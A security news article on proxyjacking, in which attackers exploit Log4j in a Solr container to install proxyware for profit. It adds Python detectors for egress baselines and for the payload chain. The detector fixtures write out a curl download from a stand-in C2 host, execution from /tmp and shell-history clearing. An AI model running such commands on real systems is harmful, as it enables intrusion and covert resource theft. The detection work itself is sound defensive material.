Threat actors have found a lucrative new attack vector that hijacks legitimate proxyware services, which allow people to sell portions of their Internet bandwidth to third parties. In large-scale attacks that exploit cloud-based systems, cybercriminals can use this vector — dubbed "proxyjacking" — to earn potentially hundreds of thousands of dollars per month in passive income, researchers from Sysdig Threat Research Team (TRT) have found.
In a February blog post, Kaspersky researchers described proxyware services like this: "[Users install a client that creates a] proxy server. Installed on a desktop computer or smartphone, it makes the device's Internet connection accessible to an outside party." That outside party — the proxyware service — then resells an agreed-upon portion of the user's bandwidth to other people.
"Depending on how long the program remains enabled and how much bandwidth it is permitted to use, the client accumulates points [for the user] that can eventually be converted into currency and transferred to a bank account," according to researchers at Kaspersky.
In one attack that the Sysdig researchers observed, threat actors compromised a container in a cloud environment using the Log4j vulnerability, and then installed a proxyware agent that turned the system into a proxy server without the container-owner's knowledge, the researchers revealed in a blog post on April 4.
This allowed the attacker to "sell the IP to a proxyware service and collect the profit," in an unusual type of Log4j exploit. Usually, Log4j attacks involve an actor dropping a backdoor or cryptojacking payload on the device, Crystal Morin, Sysdig threat research engineer, wrote in the post. "While Log4j attacks are common, the payload used in this case was uncommon," she wrote.
Proxyjacking shares characteristics of cryptojacking in that both profit off the bandwidth of a victim — and both are about equally profitable for the attacker, Morin said. However, these attacks differ in that attackers typically install CPU-based miners to extract maximum value from compromised systems, while proxyjacking mainly uses network resources — leaving a minimal CPU footprint, she wrote.
"Nearly every piece of monitoring software will have CPU usage as one of the first (and rightfully most important) metrics," she wrote. "Proxyjacking's effect on the system is marginal: 1 GB of network traffic spread out over a month is tens of megabytes per day — very likely to go unnoticed."
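The point above, that a CPU-first dashboard never sees a proxyjacked workload, is easiest to appreciate with a side-by-side detector. The following is an added example written for this article, not Sysdig's code or any product's rule set: it runs a CPU-threshold check and a per-container egress-baseline check over constructed daily telemetry for three hypothetical containers. The quiet Solr pod gains only about 35 MB/day, which is invisible to the CPU rule but stands out against its own baseline; the busy web pod's large, noisy egress is not flagged; the batch pod trips the CPU rule for a benign nightly job.

```python
"""Added example: egress-baseline detection for low-and-slow bandwidth theft.

Telemetry is constructed inline (egress in MB/day and peak CPU %, oldest day first).
Container names, values and thresholds are assumptions for illustration.
"""
from statistics import median

TRAIN_DAYS = 10     # days used to build each container's own baseline
RECENT_DAYS = 3     # consecutive days that must exceed the threshold (sustained, not a burst)
K = 5.0             # robust z-score cutoff on top of the baseline
MIN_DELTA_MB = 5.0  # ignore increases smaller than this; avoids noise on near-idle containers

# Constructed daily samples: (egress_mb, peak_cpu_pct), 14 days per container.
SAMPLES = {
    # near-idle Solr pod: ~2 MB/day, then a sustained ~35 MB/day increase from day 11
    "solr-0": [(2.0, 3.0), (2.3, 3.1), (1.9, 2.9), (2.1, 3.0), (2.4, 3.2),
               (2.0, 3.0), (2.2, 3.1), (1.8, 2.8), (2.1, 3.0), (2.0, 3.0),
               (36.0, 3.1), (38.0, 3.0), (35.0, 3.2), (37.0, 3.1)],
    # busy web pod: large, noisy egress that is normal for it
    "web-0": [(900, 30), (1300, 41), (800, 25), (1500, 45), (1100, 35),
              (950, 31), (1400, 44), (850, 27), (1250, 39), (1000, 33),
              (1200, 37), (1450, 43), (900, 28), (1350, 40)],
    # batch pod: flat egress, one benign CPU spike from a nightly job on day 8
    "batch-0": [(5.0, 10), (5.2, 12), (4.8, 9), (5.1, 11), (5.0, 10),
                (4.9, 10), (5.3, 12), (5.0, 95), (5.1, 11), (4.9, 10),
                (5.0, 10), (5.2, 11), (4.8, 9), (5.1, 10)],
}


def robust_baseline(values):
    """Median and scaled median absolute deviation (robust to a few outlier days)."""
    med = median(values)
    mad = median(abs(v - med) for v in values) * 1.4826
    return med, mad


def egress_alerts(samples, train_days=TRAIN_DAYS, recent_days=RECENT_DAYS):
    """Flag containers whose last `recent_days` all sit above their own baseline."""
    alerts = []
    for name, rows in samples.items():
        egress = [mb for mb, _ in rows]
        train, recent = egress[:train_days], egress[-recent_days:]
        med, mad = robust_baseline(train)
        threshold = med + max(K * mad, MIN_DELTA_MB)
        if all(v > threshold for v in recent):
            alerts.append({
                "container": name,
                "baseline_mb": round(med, 1),
                "threshold_mb": round(threshold, 1),
                "recent_mb": round(median(recent), 1),
            })
    return alerts


def cpu_alerts(samples, cpu_limit=80.0):
    """The metric most dashboards check first; shown to illustrate what it misses."""
    return [name for name, rows in samples.items()
            if any(cpu > cpu_limit for _, cpu in rows)]


if __name__ == "__main__":
    print("CPU rule fires on:   ", cpu_alerts(SAMPLES))      # only the benign batch job
    print("Egress rule fires on:", egress_alerts(SAMPLES))   # only the proxyjacked Solr pod
```

The baseline is per container rather than fleet-wide on purpose: a 35 MB/day increase is noise for the web pod but a roughly twentyfold change for the Solr pod, and a cloud billing alert set at the account level (as the researchers recommend) would only see the sum.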
How Proxyjacking Works
Proxyjacking is a relatively new phenomenon spurred by the growth and use of proxyware services in the last couple of years, the researchers said. As mentioned, these services, such as IPRoyal, Honeygain, and Peer2Profit, are installed as apps or software on Internet-connected devices and, while running, let the device owner share Internet bandwidth with third parties who pay to route traffic through the app user's IP address.
Proxyware comes in handy for people who want to use someone else's IP address for activity such as watching a YouTube video that isn't available in their region, conducting unrestricted Web scraping and surfing, or browsing dubious websites without attributing the activity to their own IP, the researchers said. Depending on the service, customers pay for each shared IP address based on the number of hours the sharer keeps the application running.
In the attack investigated by Sysdig researchers, attackers targeted an unpatched Apache Solr service running in Kubernetes infrastructure to take control of a container in the environment, and then downloaded a malicious script from a command-and-control (C2) server, which they placed in the /tmp folder, where they had the privileges needed to run it.
"The attacker's first execution was downloading an ELF file renamed /tmp/p32, which was then executed with some parameters, including the email address [email protected][.]com and the associated password for their pawns.app account," Morin wrote in the post.
Pawns.app is a proxyware service that has been seen sharing IPs from IPRoyal's proxy network. Indeed, Sysdig TRT correlated the binary downloaded and executed in the malicious script to the command-line interface version of the IPRoyal Pawns application from GitHub, which uses the same parameters, researchers said. In this way, attackers began using the compromised pod to earn money on the service, they said.
Attackers covered their tracks by cleaning the compromised system of their activity: clearing the shell history and removing the file they dropped in the container along with the temporary files, the researchers added.
Impact & Mitigation for Proxyjacking Attacks
While the list of proxyware services reported as being used for proxyjacking is small right now, Sysdig researchers believe that this attack vector will continue to grow and eventually "defenders will uncover more nefarious activities," Morin wrote. "This is a low-effort and high-reward attack for threat actors, with the potential for far-reaching implications."
Researchers estimate that one proxyjacked IP address, kept active 24 hours a day, earns an attacker $9.60 per month. In a modest compromise of, say, 100 IP addresses, then, a cybercriminal could net passive income of nearly $1,000 per month from this activity, they said.
When exploiting Log4j on unpatched systems, this figure can climb even higher, as millions of servers are still running vulnerable versions of the logging tool, and more than 23,000 of them can be reached from the Internet, according to Censys, the researchers said. "This vulnerability alone could theoretically provide more than $220,000 in profit per month" for an attacker, Morin wrote.
To avoid "receiving potentially shocking usage bills" due to proxyjacking activity, organizations need to take action to mitigate potential attacks, the researchers said. They recommended that organizations set up billing limits and alerts with their respective cloud service providers, which can be an early indicator that something is amiss, Morin wrote.
Morin advised that organizations should also have threat-detection rules in place to receive alerts on any initial-access and payload activity that precedes the installation of a proxyware application on their network.
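The initial-access and payload stages described in this article (a shell spawned from the Solr JVM, a download into /tmp, execution of the dropped file, and history clearing) lend themselves to process-event rules. The following is an added example, not Sysdig's or Falco's rule content: it evaluates four such rules over constructed process-exec records resembling what a container runtime or syscall sensor emits, and escalates only when an initial-access indicator and a payload stage occur in the same container within a short window. Container names, PIDs, the C2 hostname and the redacted arguments are constructed; the /tmp/p32 filename is the one reported in the article.

```python
"""Added example: sequence rules for the proxyjacking payload chain.

Event records are constructed JSON lines (one per process exec). Field names,
container IDs, PIDs and the .invalid C2 host are assumptions for illustration.
"""
import json
import re
from collections import defaultdict

RAW_EVENTS = """\
{"ts": 1, "container": "solr-7d9", "pid": 201, "ppid": 1, "comm": "java", "cmdline": "java -jar start.jar"}
{"ts": 2, "container": "solr-7d9", "pid": 333, "ppid": 201, "comm": "sh", "cmdline": "sh -c curl -o /tmp/p32 http://c2.example.invalid/p32"}
{"ts": 3, "container": "solr-7d9", "pid": 334, "ppid": 333, "comm": "curl", "cmdline": "curl -o /tmp/p32 http://c2.example.invalid/p32"}
{"ts": 4, "container": "solr-7d9", "pid": 335, "ppid": 333, "comm": "chmod", "cmdline": "chmod +x /tmp/p32"}
{"ts": 5, "container": "solr-7d9", "pid": 336, "ppid": 333, "comm": "p32", "cmdline": "/tmp/p32 <credentials redacted>"}
{"ts": 6, "container": "solr-7d9", "pid": 337, "ppid": 333, "comm": "sh", "cmdline": "sh -c history -c; rm -f /tmp/p32"}
{"ts": 7, "container": "web-a1c", "pid": 410, "ppid": 1, "comm": "nginx", "cmdline": "nginx -g daemon off;"}
{"ts": 8, "container": "web-a1c", "pid": 411, "ppid": 1, "comm": "sh", "cmdline": "sh -c /usr/local/bin/rotate-logs"}
"""

SHELLS = {"sh", "bash", "dash", "ash"}
SERVICE_PARENTS = {"java"}             # Solr runs on the JVM; extend for other exposed services
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADERS = {"curl", "wget"}
HISTORY_WIPE = re.compile(r"\bhistory\s+-c\b|\.bash_history\b")
PAYLOAD_RULES = {"exec_from_scratch_dir", "download_to_scratch_dir"}


def parse_events(raw):
    return [json.loads(line) for line in raw.splitlines() if line.strip()]


def argv0(ev):
    parts = ev["cmdline"].split()
    return parts[0] if parts else ""


def evaluate(events):
    """Return {container: [(ts, rule_name), ...]} for every rule that matched."""
    by_pid = {(e["container"], e["pid"]): e for e in events}
    findings = defaultdict(list)
    for ev in events:
        c = ev["container"]
        parent = by_pid.get((c, ev["ppid"]))
        # initial access: an interactive shell whose parent is the service process itself
        if ev["comm"] in SHELLS and parent and parent["comm"] in SERVICE_PARENTS:
            findings[c].append((ev["ts"], "shell_spawned_by_service"))
        # payload: a binary run from a world-writable scratch directory
        if argv0(ev).startswith(SCRATCH_DIRS):
            findings[c].append((ev["ts"], "exec_from_scratch_dir"))
        # payload staging: a downloader writing into a scratch directory
        if ev["comm"] in DOWNLOADERS and any(d in ev["cmdline"] for d in SCRATCH_DIRS):
            findings[c].append((ev["ts"], "download_to_scratch_dir"))
        # anti-forensics: clearing or truncating shell history
        if HISTORY_WIPE.search(ev["cmdline"]):
            findings[c].append((ev["ts"], "shell_history_cleared"))
    return dict(findings)


def score(findings, window=300):
    """'high' when initial access and a payload stage land in one container within `window` s."""
    verdicts = {}
    for c, hits in findings.items():
        access = [t for t, r in hits if r == "shell_spawned_by_service"]
        payload = [t for t, r in hits if r in PAYLOAD_RULES]
        if access and payload and min(abs(a - p) for a in access for p in payload) <= window:
            verdicts[c] = "high"
        elif hits:
            verdicts[c] = "medium"
    return verdicts


if __name__ == "__main__":
    found = evaluate(parse_events(RAW_EVENTS))
    for container, hits in found.items():
        print(container, [r for _, r in hits])
    print(score(found))   # {'solr-7d9': 'high'}
```

The nginx container's scheduled `sh -c /usr/local/bin/rotate-logs` matches nothing because its parent is not a service process and it touches no scratch directory; that is the intended trade-off, since alerting on every shell in every container would bury the chain that matters.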